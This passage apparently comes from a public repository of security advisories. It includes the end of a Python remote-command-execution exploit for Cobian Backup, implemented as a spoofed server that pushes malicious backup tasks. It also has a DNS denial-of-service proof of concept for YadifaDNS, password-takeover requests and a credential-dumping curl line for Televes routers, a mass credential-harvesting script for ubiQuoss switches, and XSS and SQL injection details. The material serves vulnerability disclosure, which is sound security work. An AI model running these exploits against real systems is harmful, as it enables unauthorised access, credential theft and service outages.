340 | 0x73, 0x00, 0x3d, 0x00, 0x66, 0x00, 0x61, 0x00,
341 | 0x6c, 0x00, 0x73, 0x00, 0x65, 0x00, 0x22, 0x00,
342 | 0x22, 0x00, 0x2c, 0x00, 0x4d, 0x00, 0x69, 0x00,
343 | 0x72, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x72, 0x00,
344 | 0x3d, 0x00, 0x66, 0x00, 0x61, 0x00, 0x6c, 0x00,
345 | 0x73, 0x00, 0x65, 0x00, 0x2c, 0x00, 0x22, 0x00,
346 | 0x22, 0x00, 0x41, 0x00, 0x62, 0x00, 0x73, 0x00,
347 | 0x6f, 0x00, 0x6c, 0x00, 0x75, 0x00, 0x74, 0x00,
348 | 0x65, 0x00, 0x20, 0x00, 0x70, 0x00, 0x61, 0x00,
349 | 0x74, 0x00, 0x68, 0x00, 0x73, 0x00, 0x3d, 0x00,
350 | 0x66, 0x00, 0x61, 0x00, 0x6c, 0x00, 0x73, 0x00,
351 | 0x65, 0x00, 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00,
352 | 0x22, 0x00, 0x22, 0x00, 0x41, 0x00, 0x6c, 0x00,
353 | 0x77, 0x00, 0x61, 0x00, 0x79, 0x00, 0x73, 0x00,
354 | 0x20, 0x00, 0x63, 0x00, 0x72, 0x00, 0x65, 0x00,
355 | 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x20, 0x00,
356 | 0x74, 0x00, 0x6f, 0x00, 0x70, 0x00, 0x20, 0x00,
357 | 0x64, 0x00, 0x69, 0x00, 0x72, 0x00, 0x65, 0x00,
358 | 0x63, 0x00, 0x74, 0x00, 0x6f, 0x00, 0x72, 0x00,
359 | 0x79, 0x00, 0x3d, 0x00, 0x74, 0x00, 0x72, 0x00,
360 | 0x75, 0x00, 0x65, 0x00, 0x22, 0x00, 0x22, 0x00,
361 | 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x43, 0x00,
362 | 0x6c, 0x00, 0x65, 0x00, 0x61, 0x00, 0x72, 0x00,
363 | 0x20, 0x00, 0x61, 0x00, 0x72, 0x00, 0x63, 0x00,
364 | 0x68, 0x00, 0x69, 0x00, 0x76, 0x00, 0x65, 0x00,
365 | 0x20, 0x00, 0x61, 0x00, 0x74, 0x00, 0x74, 0x00,
366 | 0x72, 0x00, 0x69, 0x00, 0x62, 0x00, 0x75, 0x00,
367 | 0x74, 0x00, 0x65, 0x00, 0x3d, 0x00, 0x74, 0x00,
368 | 0x72, 0x00, 0x75, 0x00, 0x65, 0x00, 0x22, 0x00,
369 | 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00,
370 | 0x49, 0x00, 0x6e, 0x00, 0x63, 0x00, 0x6c, 0x00,
371 | 0x75, 0x00, 0x64, 0x00, 0x65, 0x00, 0x20, 0x00,
372 | 0x62, 0x00, 0x61, 0x00, 0x63, 0x00, 0x6b, 0x00,
373 | 0x75, 0x00, 0x70, 0x00, 0x20, 0x00, 0x74, 0x00,
374 | 0x79, 0x00, 0x70, 0x00, 0x65, 0x00, 0x3d, 0x00,
375 | 0x74, 0x00, 0x72, 0x00, 0x75, 0x00, 0x65, 0x00,
376 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00,
377 | 0x22, 0x00, 0x44, 0x00, 0x65, 0x00, 0x6c, 0x00,
378 | 0x65, 0x00, 0x74, 0x00, 0x65, 0x00, 0x20, 0x00,
379 | 0x65, 0x00, 0x6d, 0x00, 0x70, 0x00, 0x74, 0x00,
380 | 0x79, 0x00, 0x20, 0x00, 0x64, 0x00, 0x69, 0x00,
381 | 0x72, 0x00, 0x65, 0x00, 0x63, 0x00, 0x74, 0x00,
382 | 0x6f, 0x00, 0x72, 0x00, 0x69, 0x00, 0x65, 0x00,
383 | 0x73, 0x00, 0x3d, 0x00, 0x66, 0x00, 0x61, 0x00,
384 | 0x6c, 0x00, 0x73, 0x00, 0x65, 0x00, 0x22, 0x00,
385 | 0x22, 0x00, 0x2c, 0x00, 0x49, 0x00, 0x6d, 0x00,
386 | 0x70, 0x00, 0x65, 0x00, 0x72, 0x00, 0x73, 0x00,
387 | 0x6f, 0x00, 0x6e, 0x00, 0x61, 0x00, 0x74, 0x00,
388 | 0x65, 0x00, 0x3d, 0x00, 0x66, 0x00, 0x61, 0x00,
389 | 0x6c, 0x00, 0x73, 0x00, 0x65, 0x00, 0x2c, 0x00,
390 | 0x22, 0x00, 0x22, 0x00, 0x41, 0x00, 0x62, 0x00,
391 | 0x6f, 0x00, 0x72, 0x00, 0x74, 0x00, 0x20, 0x00,
392 | 0x69, 0x00, 0x66, 0x00, 0x20, 0x00, 0x69, 0x00,
393 | 0x6d, 0x00, 0x70, 0x00, 0x65, 0x00, 0x72, 0x00,
394 | 0x73, 0x00, 0x6f, 0x00, 0x6e, 0x00, 0x61, 0x00,
395 | 0x74, 0x00, 0x69, 0x00, 0x6f, 0x00, 0x6e, 0x00,
396 | 0x20, 0x00, 0x66, 0x00, 0x61, 0x00, 0x69, 0x00,
397 | 0x6c, 0x00, 0x73, 0x00, 0x3d, 0x00, 0x66, 0x00,
398 | 0x61, 0x00, 0x6c, 0x00, 0x73, 0x00, 0x65, 0x00,
399 | 0x22, 0x00, 0x22, 0x00,
400 | 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x52, 0x00,
401 | 0x75, 0x00, 0x6e, 0x00, 0x20, 0x00, 0x61, 0x00,
402 | 0x73, 0x00, 0x20, 0x00, 0x55, 0x00, 0x73, 0x00,
403 | 0x65, 0x00, 0x72, 0x00, 0x20, 0x00, 0x6e, 0x00,
404 | 0x61, 0x00, 0x6d, 0x00, 0x65, 0x00, 0x3d, 0x00,
405 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00,
406 | 0x22, 0x00, 0x52, 0x00, 0x75, 0x00, 0x6e, 0x00,
407 | 0x20, 0x00, 0x61, 0x00, 0x73, 0x00, 0x20, 0x00,
408 | 0x44, 0x00, 0x6f, 0x00, 0x6d, 0x00, 0x61, 0x00,
409 | 0x69, 0x00, 0x6e, 0x00, 0x3d, 0x00, 0x2e, 0x00,
410 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00,
411 | 0x22, 0x00, 0x52, 0x00, 0x75, 0x00, 0x6e, 0x00,
412 | 0x20, 0x00, 0x61, 0x00, 0x73, 0x00, 0x20, 0x00,
413 | 0x50, 0x00, 0x61, 0x00, 0x73, 0x00, 0x73, 0x00,
414 | 0x77, 0x00, 0x6f, 0x00, 0x72, 0x00, 0x64, 0x00,
415 | 0x3d, 0x00, 0x59, 0x00, 0x77, 0x00, 0x42, 0x00,
416 | 0x69, 0x00, 0x41, 0x00, 0x47, 0x00, 0x51, 0x00,
417 | 0x41, 0x00, 0x66, 0x00, 0x41, 0x00, 0x42, 0x00,
418 | 0x36, 0x00, 0x41, 0x00, 0x48, 0x00, 0x77, 0x00,
419 | 0x41, 0x00, 0x5a, 0x00, 0x51, 0x00, 0x42, 0x00,
420 | 0x69, 0x00, 0x41, 0x00, 0x47, 0x00, 0x51, 0x00,
421 | 0x41, 0x00, 0x63, 0x00, 0x67, 0x00, 0x41, 0x00,
422 | 0x34, 0x00, 0x41, 0x00, 0x48, 0x00, 0x51, 0x00,
423 | 0x41, 0x00, 0x45, 0x00, 0x77, 0x00, 0x41, 0x00,
424 | 0x44, 0x00, 0x41, 0x00, 0x41, 0x00, 0x77, 0x00,
425 | 0x41, 0x00, 0x63, 0x00, 0x77, 0x00, 0x42, 0x00,
426 | 0x6d, 0x00, 0x41, 0x00, 0x48, 0x00, 0x55, 0x00,
427 | 0x41, 0x00, 0x61, 0x00, 0x41, 0x00, 0x41, 0x00,
428 | 0x64, 0x00, 0x41, 0x00, 0x41, 0x00, 0x45, 0x00,
429 | 0x41, 0x00, 0x63, 0x00, 0x67, 0x00, 0x42, 0x00,
430 | 0x68, 0x00, 0x41, 0x00, 0x48, 0x00, 0x49, 0x00,
431 | 0x41, 0x00, 0x61, 0x00, 0x51, 0x00, 0x41, 0x00,
432 | 0x45, 0x00, 0x41, 0x00, 0x41, 0x00, 0x38, 0x00,
433 | 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x42, 0x00,
434 | 0x34, 0x00, 0x41, 0x00, 0x42, 0x00, 0x30, 0x00,
435 | 0x41, 0x00, 0x62, 0x00, 0x77, 0x00, 0x41, 0x00,
436 | 0x4a, 0x00, 0x41, 0x00, 0x47, 0x00, 0x41, 0x00,
437 | 0x41, 0x00, 0x64, 0x00, 0x77, 0x00, 0x42, 0x00,
438 | 0x6a, 0x00, 0x41, 0x00, 0x43, 0x00, 0x77, 0x00,
439 | 0x41, 0x00, 0x44, 0x00, 0x41, 0x00, 0x41, 0x00,
440 | 0x42, 0x00, 0x41, 0x00, 0x48, 0x00, 0x34, 0x00,
441 | 0x41, 0x00, 0x47, 0x00, 0x77, 0x00, 0x42, 0x00,
442 | 0x70, 0x00, 0x41, 0x00, 0x41, 0x00, 0x73, 0x00,
443 | 0x41, 0x00, 0x65, 0x00, 0x67, 0x00, 0x42, 0x00,
444 | 0x31, 0x00, 0x41, 0x00, 0x47, 0x00, 0x41, 0x00,
445 | 0x41, 0x00, 0x61, 0x00, 0x41, 0x00, 0x41, 0x00,
446 | 0x4d, 0x00, 0x41, 0x00, 0x44, 0x00, 0x59, 0x00,
447 | 0x41, 0x00, 0x5a, 0x00, 0x77, 0x00, 0x41, 0x00,
448 | 0x69, 0x00, 0x41, 0x00, 0x41, 0x00, 0x3d, 0x00,
449 | 0x3d, 0x00, 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00,
450 | 0x2f, 0x00, 0x2f, 0x00, 0x31, 0x00, 0x31, 0x00,
451 | 0x7d, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x0d, 0x00,
452 | 0x0a, 0x00 ]
453 |
454 | execute_template = [
455 | 0x42, 0x00, 0x41, 0x00, 0x43, 0x00, 0x4b, 0x00,
456 | 0x55, 0x00, 0x50, 0x00, 0x5f, 0x00, 0x53, 0x00,
457 | 0x45, 0x00, 0x4c, 0x00, 0x45, 0x00, 0x43, 0x00,
458 | 0x54, 0x00, 0x45, 0x00, 0x44, 0x00, 0x2c, 0x00,
459 | 0x7b, 0x00, 0x45, 0x00, 0x37, 0x00, 0x45, 0x00,
460 | 0x43, 0x00, 0x46, 0x00, 0x34, 0x00, 0x32, 0x00,
461 | 0x44, 0x00, 0x2d, 0x00, 0x37, 0x00, 0x38, 0x00,
462 | 0x45, 0x00, 0x34, 0x00, 0x2d, 0x00, 0x34, 0x00,
463 | 0x32, 0x00, 0x34, 0x00, 0x38, 0x00, 0x2d, 0x00,
464 | 0x42, 0x00, 0x37, 0x00, 0x45, 0x00, 0x45, 0x00,
465 | 0x2d, 0x00, 0x33, 0x00, 0x38, 0x00, 0x39, 0x00,
466 | 0x35, 0x00, 0x33, 0x00, 0x36, 0x00, 0x44, 0x00,
467 | 0x38, 0x00, 0x42, 0x00, 0x44, 0x00, 0x33, 0x00,
468 | 0x38, 0x00, 0x7d, 0x00, 0x2c, 0x00, 0x66, 0x00,
469 | 0x61, 0x00, 0x6c, 0x00, 0x73, 0x00, 0x65, 0x00,
470 | 0x0d, 0x00, 0x0a, 0x00]
471 |
472 | #### I know, I know, just wanted to try it fast don't hate me because this shit
473 | create_task = ""
474 | for x in task_template:
475 | create_task = create_task + chr(x)
476 |
477 | execute_task = ""
478 | for x in execute_template:
479 | execute_task = execute_task + chr(x)
480 |
481 | ###### Client handler
482 | def clients(conn):
483 | data = conn.recv(1024).split(",")
484 | print " -> Machine: " + data[2]
485 | print " -> Encrypted Password:\n" + data[1]
486 | conn.send(password_ok.decode("hex"))
487 |
488 | ping = conn.recv(1024)
489 | print "[+] Creating new task..."
490 | conn.send(create_task)
491 | ack = conn.recv(1024).split(",")
492 | print "[+] " + ack[0]
493 | conn.send(iddle.decode("hex"))
494 | ping = conn.recv(1024)
495 | print "[+] Executing task..."
496 | conn.send(execute_task)
497 | ack = conn.recv(1024).split(",")
498 | print "[+] Is it OK? " + ack[0]
499 | conn.close()
500 |
501 |
502 | ####### Main
503 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
504 | try:
505 | sock.bind((host, port))
506 | except socket.error as msg:
507 | print "Error: " + str(msg) + " - " + msg[1]
508 | sys.exit(1)
509 | sock.listen(10)
510 |
511 | while 1:
512 | conn, addr = sock.accept()
513 | print "[+] New client connected from " + addr[0]
514 | start_new_thread(clients, (conn,))
515 | sock.close()
--------------------------------------------------------------------------------
/2017/CVE-2017-11318/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-11318: Remote Command Execution in Cobian Backup
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ CobianSoft
6 | __Vendor URL:__ https://www.cobiansoft.com
7 | __Versions affected:__ Cobian Backup 11
8 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ No
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2017/CVE-2017-11318/CVE-2017-11318.py))
11 |
12 |
13 |
14 |
15 | ## Summary
16 | An attacker can execute arbitrary commands on a remote machine in the same network via a spoofed master server.
17 |
18 | ## Details
19 | An attacker can add and execute new backup tasks when the master server is spooofed (via Man-in-the-Middle). The commands are executed using the pre-backup events defined in a new task.
20 |
21 | ## Impact
22 | An attacker can execute arbitrary commands in a target machine.
23 |
24 | ## Recommendation
25 | This software has no support since 2014, so this vulnerability will not be fixed.
26 |
27 | ## Timeline
28 |
29 | #
30 |
31 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
32 |
33 |
--------------------------------------------------------------------------------
/2017/CVE-2017-14339/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-14339: Remote Denial of Service in YadifaDNS
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ EURid
6 | __Vendor URL:__ https://www.yadifa.eu
7 | __Versions affected:__ YadifaDNS <= 2.2.5
8 | __Discovered by:__ Javier Gil ([@ca0s_](https://twitter.com/ca0s_))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2017/CVE-2017-14339/))
11 |
12 | ## Summary
13 | The DNS packet parser in YADIFA before 2.2.6 does not check for the presence of infinite pointer loops, and thus it is possible to force it to enter an infinite loop. This can cause high CPU usage and makes the server unresponsive.
14 |
15 | ## Details
16 | The DNS packet parser does not check for the presence of infinite pointer loops, and thus it is possible to force the thread to enter an infinite loop. The number of threads running on the service that process DNS messages depends on the server’s configuration, so the number of packets needed to make the server to completely stop answering is not fixed. Each time we send the packet, a thread will get stuck forever, until no more threads are available.
17 |
18 | The following is a simple PoC:
19 |
20 | ```python
21 | # Yadifa DoS PoC
22 | # Discovered by: Javier Gil (@ca0s_)
23 | import socket
24 | import sys
25 | if __name__ == '__main__':
26 | if len(sys.argv) < 2: print "Usage: %s IP [PORT]" % (sys.argv[0], ) sys.exit(-1) IP = sys.argv[1] if len(sys.argv) >= 3:
27 | PORT = int(sys.argv[2])
28 | else:
29 | PORT = 53
30 | exploit = "3132000000010000000001010a6b61306c6162732d000100000e100006036e7336c00cc02300"
31 | print "[+] Yadifa DoS PoC"
32 | print "[+] Sending packet..."
33 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
34 | sock.sendto(exploit.decode("hex"), (IP, PORT))
35 | print "[+] Sent!"
36 | ```
37 |
38 | ## Impact
39 | An attacker can cause a denial of service.
40 |
41 | ## Recommendation
42 | Update to last version.
43 |
44 | ## Timeline
45 | * 01/09/2017 – Initial contact with EURid’s security team and bug report, following a strict FD policy (Friday Disclosure)
46 | * 01/09/2017 – Got an answer from EURid, information forwarded to yadifa developers
47 | * 04/09/2017 – PoC sent to EURid
48 | * 08/09/2017 – Bug reproduced by EURid’s developers, start developing a patch
49 | * 11/09/2017 – Contact with MITRE
50 | * 12/09/2017 – CVE-2017-14339 assigned
51 | * 13/09/2017 – yadifa 2.2.6 released, bug fixed
52 |
53 | #
54 |
55 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
56 |
--------------------------------------------------------------------------------
/2017/CVE-2017-6530/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-6530: Arbitrary password change in Televes Coaxdata Gateway 1Gbps
2 |
3 | ## Software
4 | []() []() []()
5 |
6 | __Vendor:__ Televes
7 | __Vendor URL:__ https://www.televes.com
8 | __Versions affected:__ Televes Coaxdata Gateway 1Gbps
9 | __Discovered by:__ Pedro Andujar ([@pandujar](https://twitter.com/pandujar))
10 | __Public fix:__ Yes
11 | __Proof of Concept:__ No
12 |
13 | ## Summary
14 | A restricted user can modify the Admin password.
15 |
16 | ## Details
17 | An authenticated low privileged user can modify the Admin password using the following request:
18 |
19 | ```
20 | http://TARGET/password.shtml?DeviceInfo.X_ATH-COM_TeleComAccount.Password=
21 | ```
22 |
23 | ## Impact
24 | This vulnerability can be exploited to do an account takeover of the admin user.
25 |
26 | ## Recommendation
27 | Update the firmware to last version and block the adminsitration web interface on the internet or untrusted networks.
28 |
29 | ## Timeline
30 | * 27/2/2017 - Reported vulnerability to vendor
31 | * 28/2/2017 - Technical details sent on a 2nd contact attempt
32 | * 01/3/2017 - Manufacturer acknowledge the issues and stats that restricted user would be removed from future releases
33 | * 13/7/2017 - Follow up email related to resolution. No response
34 | * 20/7/2017 - Public Disclosure
35 |
36 | #
37 |
38 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2017/CVE-2017-6531/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-6531: Unrestricted backup restore in Televes Coaxdata Gateway 1Gbps
2 | ## Software
3 | []() []() []()
4 |
5 | __Vendor:__ Televes
6 | __Vendor URL:__ https://www.televes.com
7 | __Versions affected:__ Televes Coaxdata Gateway 1Gbps
8 | __Discovered by:__ Pedro Andujar ([@pandujar](https://twitter.com/pandujar))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ No
11 |
12 |
13 | ## Summary
14 | A restricted user can update the configuration via "backup restore" functionality.
15 |
16 | ## Details
17 | An authenticated low privileged user can modify the Admin password modifying the configuration file and updating it. Steps to reproduce:
18 |
19 | 1. Update configuration file with new password
20 | ```
21 | POST /ReadFile.cgi HTTP/1.1
22 |
23 | Host:
24 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
25 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
26 | Accept-Language: en-US,en;q=0.5
27 | Referer: http:///resetrouter.shtml?DeviceInfo.AdditionalConfigVersion=default_cfg_v1.02.0014
28 | Connection: close
29 | Upgrade-Insecure-Requests: 1
30 | Content-Type: multipart/form-data; boundary=---------------------------66789582480853432558488077
31 | Content-Length: 42533
32 |
33 |
34 | -----------------------------66789582480853432558488077
35 | Content-Disposition: form-data; name="cfgfile"; filename="s"
36 | Content-Type: application/octet-stream
37 |
38 |
39 | InternetGatewayDevice.DeviceInfo.X_ATH-COM_TeleComAccount.Password -m 1 -d
40 |
41 |
42 | -----------------------------66789582480853432558488077
43 | Content-Disposition: form-data; name="LoadCfgFile"
44 |
45 | Load
46 | -----------------------------66789582480853432558488077--
47 |
48 | ```
49 |
50 | 2. Restore the configuration
51 |
52 | ```http:///result.shtml?method=LoadCfgFile&result=0&cfgfile=/tmp/s1488261988```
53 |
54 | 3. Reboot the device
55 |
56 | ```http:///result.shtml?method=Reboot```
57 |
58 | ## Impact
59 | This vulnerability can be exploited to do an account takeover of the admin user.
60 |
61 | ## Recommendation
62 | Update the firmware to last version and block the adminsitration web interface on the internet or untrusted networks.
63 |
64 | ## Timeline
65 | * 27/2/2017 - Reported vulnerability to vendor
66 | * 28/2/2017 - Technical details sent on a 2nd contact attempt
67 | * 01/3/2017 - Manufacturer acknowledge the issues and stats that restricted user would be removed from future releases
68 | * 13/7/2017 - Follow up email related to resolution. No response
69 | * 20/7/2017 - Public Disclosure
70 |
71 | #
72 |
73 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2017/CVE-2017-6532/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-6532: Backup containing cleartext credentials is accessible by restricted user in Televes Coaxdata Gateway 1Gbps
2 | ## Software
3 | []() []() []()
4 |
5 | __Vendor:__ Televes
6 | __Vendor URL:__ https://www.televes.com
7 | __Versions affected:__ Televes Coaxdata Gateway 1Gbps
8 | __Discovered by:__ Pedro Andujar ([@pandujar](https://twitter.com/pandujar))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ No
11 |
12 | ## Summary
13 | A restricted user can download the configuration file and read the admin credentials.
14 |
15 | ## Details
16 | This issue is in fact two, first one related to the lack of encryption when storing the user provided credentials wthin the
17 | configuration file, second one regarding the lack of access control to the backup file that should be restricted to admin user.
18 | This way after logging in with the default "username" credentials, you will only need to access the URL shown below, in order to
19 | find cleartext users and passwords of WiFI, WPS pin value, WAN (internet provider) and the device Admin account:
20 |
21 | ```
22 | pandujar@fogheaven:~$ curl http://192.168.2.1/mib.db | grep -i Password
23 |
24 | InternetGatewayDevice.DeviceInfo.X_ATH-COM_TeleComAccount.Password -m 1 -d Changeme1 (Admin password)
25 | InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.Password -m 1 -d Changeme2 (ISP Password)
26 | InternetGatewayDevice.X_ATH-COM_Account.UserPassword -m 1 -d 123456 (username password)
27 |
28 | ```
29 | ## Impact
30 | This vulnerability can be exploited to do an account takeover of the admin user.
31 |
32 | ## Recommendation
33 | Update the firmware to last version and block the adminsitration web interface on the internet or untrusted networks.
34 |
35 | ## Timeline
36 | * 27/2/2017 - Reported vulnerability to vendor
37 | * 28/2/2017 - Technical details sent on a 2nd contact attempt
38 | * 01/3/2017 - Manufacturer acknowledge the issues and stats that restricted user would be removed from future releases
39 | * 13/7/2017 - Follow up email related to resolution. No response
40 | * 20/7/2017 - Public Disclosure
41 | *
42 |
43 | #
44 |
45 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2017/CVE-2017-8892/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-8892: Stored XSS in OpenText TempoBox
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ OpenText
6 | __Vendor URL:__ https://www.opentext.com
7 | __Versions affected:__ OpenText TempoBox <= 10.0.3
8 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ No
11 |
12 |
13 | ## Summary
14 | An authenticated user can inject JavaScript code in image filenames.
15 |
16 | ## Details
17 | This vulnerability can be exploited easily setting the name of a image as a classic XSS payload. This can be combined with the lack of HttpOnly attribute on the "cstoken" cookie in order to leak its contents. The "cstoken" cookie is used by the TempoBox API.
18 |
19 | ## Impact
20 | This vulnerability can be exploited to do an account takeover and steal or upload files. Additionally this vulnerability is wormwable.
21 |
22 | ## Recommendation
23 | Update to software to the last version.
24 |
25 | ## Timeline
26 | * 26/10/2016 - Reported vulnerability to vendor
27 |
28 | #
29 |
30 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
31 |
--------------------------------------------------------------------------------
/2018/CVE-2018-10024/CVE-2018-10024.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # CVE-2018-10024 - Credential leak
4 | #
5 | # Software: ubiQuoss Switch VP5208A
6 | # Author: Juan Manuel Fernandez (@TheXC3LL) from BlackArrow
7 | # Details: https://github.com/blackarrowsec/advisories/tree/master/2018/CVE-2018-10024
8 | # Web: [www.blackarrow.net] - [www.tarlogic.com]
9 | #
10 |
11 |
12 | import argparse
13 | import requests
14 |
15 | # Stupid banner is stupid
16 | def banner():
17 | print "\n-=[ Ubiquoss QoS Switch - bcm_passwd tester (CVE-2018-10024) ]=-\n\n"
18 |
19 | # The pwn itself. If you enter a invalid user/pass combination a bcm_passwd file is created
20 | # This bcm_passwd is the real passwd of the QoS device. And even better: sometimes credentials are in clear-text
21 | # Fuck logic!
22 |
23 | def pwn(host):
24 | print "[+] Let's pwn " + host
25 | # Try to login with test / test
26 | print "[+] Trying to login with test / test"
27 | req = requests.post("http://" + host + "/cgi-bin/login.cgi", data = {'username' : 'test', 'password' : 'test'}, headers={'user-agent':'CVE-2018-10024 Tester. Use this as signature.'})
28 | # Is bcm_passwd created?
29 | print "[+] Testing if bcm_passwd was created"
30 | req = requests.get("http://" + host + "/cgi-bin/bcm_passwd")
31 | if req.status_code == 200:
32 | return req.text
33 | else:
34 | return -1
35 |
36 | # Argument parser
37 | parser = argparse.ArgumentParser(description='Ubiquoss QoS Switch - bcm_passwd tester')
38 | parser.add_argument('--target', dest='target', help="Target IP")
39 | parser.add_argument('--list', dest='target_file', help="File with a list of targets")
40 | parser.add_argument('--log', dest='log', help='Optional: filename to save logs')
41 | args = parser.parse_args()
42 |
43 | banner()
44 |
45 | if not args.target and not args.target_file:
46 | print "[-] Error: please use -h to see correct syntax"
47 | exit(-1)
48 |
49 | #Yep we can refactor this but... u know xD
50 | if args.target:
51 | try:
52 | pwned = pwn(args.target)
53 | if pwned != -1:
54 | print "[+] Pwned!"
55 | if args.log:
56 | file = open(args.log, "a")
57 | file.write(pwned)
58 | file.close()
59 | print "\n" + pwned
60 | else:
61 | print "[-] Test failed. Not vulnerable."
62 | except:
63 | print "[-] Test failed. Is port opened?"
64 |
65 | if args.target_file:
66 | try:
67 | with open(args.target_file, "r") as data:
68 | targets = data.read().split("\n")
69 | except:
70 | print "[-] Error: file not found or incorrect format."
71 | exit(-1)
72 | for x in targets:
73 | try:
74 | pwned = pwn(x)
75 | if pwned != -1:
76 | print "[+] Pwned!"
77 | if args.log:
78 | file = open(args.log, "a")
79 | file.write("\n" + x + "\n" + pwned + "\n---------\n")
80 | file.close()
81 | print "\n" + pwned
82 | else:
83 | print "[-] Test failed. Not vulnerable."
84 | except:
85 | print "[-] Test failed. Is port opened?"
86 |
--------------------------------------------------------------------------------
/2018/CVE-2018-10024/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-10024: Credential leak in file accessible by unauthenticated user in ubiQuoss Switch
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ ubiQuoss
6 | __Vendor URL:__ https://www.ubiquoss.com
7 | __Versions affected:__ ubiQuoss Switch VP5208A
8 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ No
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2018/CVE-2018-10024/))
11 |
12 | ## Summary
13 | An unauthenticated attacker can read system passwords in cleartext from a file accesible via HTTP.
14 |
15 | ## Details
16 | ubiQuoss Switch VP5208A creates a bcm_passwd file at /cgi-bin/ with the user credentials in cleartext when a failed login attempt occurs. The file can be reached via an HTTP request. The credentials can be used to access the system via SSH (or TELNET if it is enabled).
17 |
18 | ## Impact
19 | An attacker can read the administrator password and use it to log in the administration interfaces (HTTP, SSH or Telnet if enabled).
20 |
21 | ## Recommendation
22 | There is no fixes for this vulnerability. Block the administration interfaces on the internet or untrusted networks.
23 |
24 | ## Timeline
25 | * 18/09/17 - First attempt to contact vendor
26 | * 06/03/18 - Contacted US-CERT with the report
27 | * 15/03/18 - ACK from US-CERT. They gave us other e-mail address to try to contact
28 | * 15/03/18 - Attempt to contact vendor at the new e-mail address
29 | * 09/04/18 - Disclosure
30 |
31 |
32 |
33 | #
34 |
35 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
36 |
37 |
--------------------------------------------------------------------------------
/2018/CVE-2018-12482/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-12482: Multiple SQL injections in OCS Inventory
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ OCS Inventory
6 | __Vendor URL:__ https://ocsinventory-ng.org
7 | __Versions affected:__ OCS Inventory <= 2.4.1
8 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/Xassiz)), Jaume Llopis ([@JKS___](https://twitter.com/JKS___)) & Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ No
11 |
12 |
13 | ## Summary
14 | The search engine implemented in OCS Inventory does not perform an adequate filtering of the parameters used within SQL statements, making it possible to inject arbitrary SQL code.
15 |
16 | ## Details
17 | Some injection points:
18 |
19 | * GET and POST parameter “values” when searching from the section “Inventory -> Search with various criteria data”. When you select a search tag (for example “Network: IPADDRESS”), the SQL statement remains such that:
20 | ```
21 | select distinct HARDWARE_ID,networks.DESCRIPTION as 'Network: Description',networks.TYPE as 'Network: Type',networks.TYPEMIB as 'Network: MibType',networks.SPEED as 'Network: Speed',networks.MACADDR as 'Network: MAC Address',networks.STATUS as 'Network: Status',networks.IPADDRESS as 'Network: IP Address',networks.IPMASK as 'Network: IP Netmask',networks.IPSUBNET as 'Network: Subnetwork IP',networks.IPGATEWAY as 'Network: Gateway IP',networks.IPDHCP as 'Network: DHCP IP' from networks where ( ( IPADDRESS = '[INJECT HERE]'))
22 | ```
23 |
